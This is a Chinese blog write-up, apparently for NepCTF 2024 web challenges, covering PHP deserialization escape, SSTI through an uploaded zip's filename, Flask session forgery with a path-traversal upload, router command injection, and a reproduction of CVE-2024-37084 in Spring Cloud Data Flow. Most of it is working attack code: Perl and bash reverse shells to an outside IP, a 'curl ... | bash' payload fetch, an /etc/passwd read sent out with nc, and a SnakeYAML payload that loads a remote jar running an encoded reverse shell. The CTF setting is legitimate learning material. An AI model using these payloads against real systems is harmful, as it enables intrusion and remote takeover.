【Web】NepCTF 2024题解

最新推荐文章于 2024-09-10 19:06:59 发布
最新推荐文章于 2024-09-10 19:06:59 发布
阅读量1.4k 收藏 13
点赞数 15
文章标签: NepCTF web wp nepctf2024
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/141534542
版权

目录

PHP_MASTER!!

NepDouble

蹦蹦炸弹(boom_it)

NepRouter-白给

Always RCE First 

PHP_MASTER!!

PHP反序列化键值逃逸+mb_strposmb_substr连用导致的字符注入

https://www.cnblogs.com/EddieMurphy-blogs/p/18310518

flag在phpinfo里

payload:

?c=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00";s:3:"str";O:1:"B":1:{s:1:"b";s:7:"phpinfo";}}&nep1=%f0123%f0123%f0123%9f%9f%f0123&nep=Nep

NepDouble

在文件名处打SSTI

convert.py

def escape_string(s):
    # 定义要转义的字符
    replacements = {
        '{': r'\{',
        '}': r'\}',
        '[': r'\[',
        ']': r'\]',
        '(': r'\(',
        ')': r'\)',
        "'": r"\'",
        '"': r'\"',
    }

    # 替换字符串中的特殊字符
    for char, replacement in replacements.items():
        s = s.replace(char, replacement)

    return s


# 原始字符串
original_string = """{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('\\\\143'+'\\\\141'+'\\\\164'+'\\\\40'+'\\\\57'+'\\\\146'+'\\\\52').read()")}}"""

# 转义字符串
escaped_string = escape_string(original_string)

print(escaped_string)

生成恶意文件名的文件

vim \{\{x.__init__.__globals__\[\'__builtins__\'\]\[\'eval\'\]\(\"__import__\(\'os\'\).popen\(\'\\143\'+\'\\141\'+\'\\164\'+\'\\40\'+\'\\57\'+\'\\146\'+\'\\52\'\).read\(\)\"\)\}\}

压缩成zip

zip 1.zip \{\{x.__init__.__globals__\[\'__builtins__\'\]\[\'eval\'\]\(\"__import__\(\'os\'\).popen\(\'\\143\'+\'\\141\'+\'\\164\'+\'\\40\'+\'\\57\'+\'\\146\'+\'\\52\'\).read\(\)\"\)\}\}

upload.py上传

import requests

# 定义服务器的URL
url = "https://neptune-32978.nepctf.lemonprefect.cn/"  # 替换为你的 Flask 服务器地址

# 定义要上传的文件路径
file_path = "1.zip" # 替换为你要上传的 ZIP 文件路径

# 打开文件,以便于上传
with open(file_path, 'rb') as file:
    # 构建请求的文件部分
    files = {'tp_file': file}

    # 发送 POST 请求,上传文件
    response = requests.post(url, files=files)

    # 输出服务器响应
    print("Status Code:", response.status_code)
    print("Response Text:", response.text)

蹦蹦炸弹(boom_it)

先是flask的session伪造

再路径穿越上传lock.txt

 之后便能低权限rce

start.sh有权限更改

echo '#!/bin/bash' > start.sh
echo "perl -e 'use Socket;\$i=\"124.222.136.33\";\$p=1338;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" >> start.sh

 数据占用打崩,让服务重启反弹shell

nc 127.0.0.1 8888 < /etc/passwd

root权限读flag

 

NepRouter-白给

第一个注册流程,无论给什么图片都是TEST

找到拿字符串的html位置,手改成自己的 id,然后注册

这里要求存在一个用户NepNepIStheBestTeam,在前面就注册这个用户就能登录8080端口

setRouter处可以命令注入

参数不能带空格,用${IFS}

vps 1338起个恶意服务

bash -i >& /dev/tcp/124.222.136.33/1337 0>&1

 反弹shell

/setrouter?ip_address=127.0.0.1;curl${IFS}http://124.222.136.33:1338/evil.html|bash

Always RCE First 

对着CVE-2024-37084复现

 奇安信攻防社区-Spring Cloud Data Flow 漏洞分析(CVE-2024-22263|CVE-2024-37084)

GitHub - artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads

package.yaml

apiVersion: 1.0.0
origin: my origin
repositoryId: 12345
repositoryName: local
kind: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://124.222.136.33:1338/yaml-payload.jar"]]]]
name: test
version: 1.0.0

AwesomeScriptEngineFactory.java

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

zip包转字节列表脚本

def zip_to_byte_list(zip_file_path):
    # 打开并读取 ZIP 文件的二进制数据
    with open(zip_file_path, 'rb') as file:
        byte_content = file.read()

    # 将二进制数据转换为字节列表
    byte_list = list(byte_content)
    
    return byte_list

# 使用示例
zip_file_path = 'test-1.1.1.zip'  # 替换为你的ZIP文件路径
byte_list = zip_to_byte_list(zip_file_path)
print(byte_list)  # 输出字节列表

/api/package/upload传payload:

{"repoName":"local","name":"test","version":"1.1.1","extension":"zip","packageFileAsBytes":[x,x,x,x]}

反弹shell拿flag

Z3r4y
关注
【漏洞复现】Spring Cloud Data Flow - CVE-2024-37084 漏洞复现
总有人间一两风,填我十万八千梦
10-15 1444
Spring Cloud Data Flow(SCDF)是一个基于微服务的工具包,用于在 Cloud Foundry 和 Kubernetes 中构建流式和批量数据处理管道。在受影响版本中Skipper 服务器在处理文件上传时没有对路径进行验证,拥有 Skipper 服务器 API 访问权限攻击者可以通过构造恶意请求将 YAML 文件写入服务器的任意位置,同时由于 PackageMetadata 的创建过程中使用默认构造器反序列化 YAML 数据,从而导致任意代码执行。
CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1(2)
2401_84009698的博客
04-04 837
你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
NepCTF 2024 部分web
pwfortune的博客
08-31 1313
审计代码, render_template_string() 存在漏洞 渲染的是files_list , 里面存放的是文件名。查看etc/xinetd.d/看到pwnservice里面有个端口8888,并且这个可以写入,可以尝试利用8888进行连接。会存在一个反序列逃逸的漏洞, 经过替换之后, 字符会增多, 一次替换多出一个字符。照着ssti的思路写就行, 环境里面没有flag, 然后win的命名无法有。所以可以想到通过文件名来入手, 且需要上传的是一个zip文件。, 就无法列出根目录, 需要用到。
一文打通DES算法以及在ctf中的运用!【附2024NepCTF simpleDES巨细题解~】_ctf des
2401_83621095的博客
04-12 561
我们暂时把经过S盒处理的32bits排列称为L则P(L)的输出格式和P盒相同输出的第一位 就是根据P盒第一位获得的数值16 提取L中第16位的数值到此回顾整个加密流程就解释清楚了。
一文打通DES算法以及在ctf中的运用!【附2023NepCTF simpleDES巨细题解~】
jayq1的博客
08-19 1887
跟随文章的脚步一起到原始论文中探索DES的奥秘,同时还可以在真实的完美例题中感受DES知识的运用,文章看完,成就满满~
一文打通DES算法以及在ctf中的运用!【附2024NepCTF simpleDES巨细题解~】_ctf des(2)
2401_83739727的博客
04-14 324
列编号是0-15 用四位二进制数字表示同时我们发现在S盒中的数据不超过15 正好4位二进制可以表示的 4位!!
一文打通DES算法以及在ctf中的运用!【附2024NepCTF simpleDES巨细题解~】_ctf des(1)
2401_83621095的博客
04-12 868
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
ISCC2024 Web部分题解
2201_75627590的博客
08-01 2577
ISCC 2024 web部分题解
西普WEB大部分题解
12-09
【标题】"西普WEB大部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
LitCTF2024 web方向题解
5fn
08-12 1408
把LitCTF2024 web方向的题做完了。这里奉上题解一份。题解是比较小白方向的。刚入门web安全的可以去做一下。LitCTF的题其实都很适合新手练手,非常推荐新手入门食用。 结合NSSCTF靶场,每道题上都有考查方向。
2024 CCPC 济南 + 山东省赛 VP 记录 + 个人题解 ACDEFHIJKM
qq_48938193的博客
08-31 4773
The 2024 CCPC Shandong Invitational Contest and Provincial Collegiate Programming Contest
2022NepCTF部分WP
XINO
08-04 3513
发现是个压缩包套娃,用010看见一个流量包,直接选中数据的硬生生的提出来,虽然损坏了但是流量包可以打开,接下来发现是个键盘流量,用工具一把梭。分别作为p,q,用得到的p,q与c_mod_p,c_mod_q代入CRT方程,x等于c mod p,c 就恒等于 x % mi,.osu后缀,查了下发现是音游的文件,放软件里进行挑战,发现谱面里描出来了flag。根据旁边的如家酒店,我们用谷歌地图搜一下海南地区的如家,发现举例的一个跟图片上一样。B站直播说是最近的模板注入漏洞,就简单搜了一下,还真找到了。...
2024-HW最新漏洞整理及相应解决方案(一)
m0_72210904的博客
07-29 2633
漏洞是基于部分安全厂家、软件厂商的公众号或官方网站,以及一些非官方渠道等途径整理的HW安全漏洞情报,情报里附含漏洞详情和解决方案。护网期间我将持续更新分享,希望可以在护网期间帮助到大家。
CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1
2401_84009749的博客
04-04 428
你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
内部赛第四届网络安全攻防大赛①-初赛-团队赛 Writeup
09-10 775
(打完就没容器了。。。没截图)共32位,每位0-f 16个字符独立验证填充 爆破,根据每位回显颜色差别,可得FLAG。
ssm酒店客房管理系统的设计与制作+答辩ppt+论文+任务书+安装视频+代码讲解视频+mysql脚本.zip
06-07
项目工程资源经过测试运行,功能上ok,可复现复刻,拿到资料包后可实现复刻出一样的项目,本人系统开发经验充足(全栈),有任何使用问题欢迎随时与我联系,我会努力及时为您解惑,提供帮助 【资源内容】:包含源码、工程文件等。资源质量优质,放心下载使用!可参考实现复现;设计报告也可借鉴此项目工程;该资源内项目代码都经过测试运行,功能ok 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 【提供帮助】:有任何使用上的问题欢迎随时与我联系,及时抽时间努力解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 质量优质,放心下载使用。下载后请首先打开说明文件(如有);项目工程可实现复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途,网络商品/电子资源资料具可复制性不支持退款。质量优质,放心下载使用。
Excel使用技巧大全(大全).doc
最新发布
06-07
Excel使用技巧大全(大全).doc
noip2024题解T1
01-01
### NOIP2024 T1 题解编程竞赛解题思路 #### 背景介绍 NOIP(全国青少年信息学奥林匹克联赛)作为国内重要的计算机科学赛事之一,旨在选拔优秀的程序设计人才。每年的比赛都会设置不同难度级别的题目来测试参赛者的算法能力和编程技巧。 #### 解析与策略制定 对于NOIP2024的第一道题目而言,通常这类题目会偏向基础概念的理解和简单应用,目的是让大部分选手能够入手并获得一定分数的同时也筛选出具备更深入思考能力的学生[^4]。 考虑到这一点,在面对T1这样的入门级挑战时,可以采取如下几种常见处理方式: - **直接求解**:如果问题本身相对直观,则可以直接通过观察数据特点找到规律进而得出结论。 - **暴力枚举**:当不确定最优解决方案时,可以通过遍历所有可能情况的方法尝试解决问题,虽然效率较低但对于小规模的数据集仍然适用。 - **模拟过程**:针对一些涉及具体操作流程的问题,按照给定条件逐步模仿实际执行步骤直至达到目标状态。 假设本年度的首题围绕着珠心算测验展开讨论,那么基于以往的经验来看,该类试题往往适合采用枚举的方式进行解答[^2]。下面给出一种具体的实现方案: ```cpp #include <iostream> using namespace std; int main() { int n; cin >> n; // 输入人数n bool flag[n+1]; memset(flag, false, sizeof(flag)); int a[n]; for(int i=1;i<=n;++i){ cin>>a[i]; for(int j=1;j<i;++j) for(int k=j+1;k<i;++k) if(a[j]+a[k]==a[i]) {flag[i]=true;break;} } int cnt=0; for(int i=1;i<=n;++i)if(!flag[i]) ++cnt; cout<<cnt<<"\n"; } ``` 上述代码实现了对每个数是否能由其他两个不同的数组合而成这一性质进行了判断,并统计满足特定条件的数量。这种方法不仅易于理解而且便于编码实现,非常适合初学者练习使用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值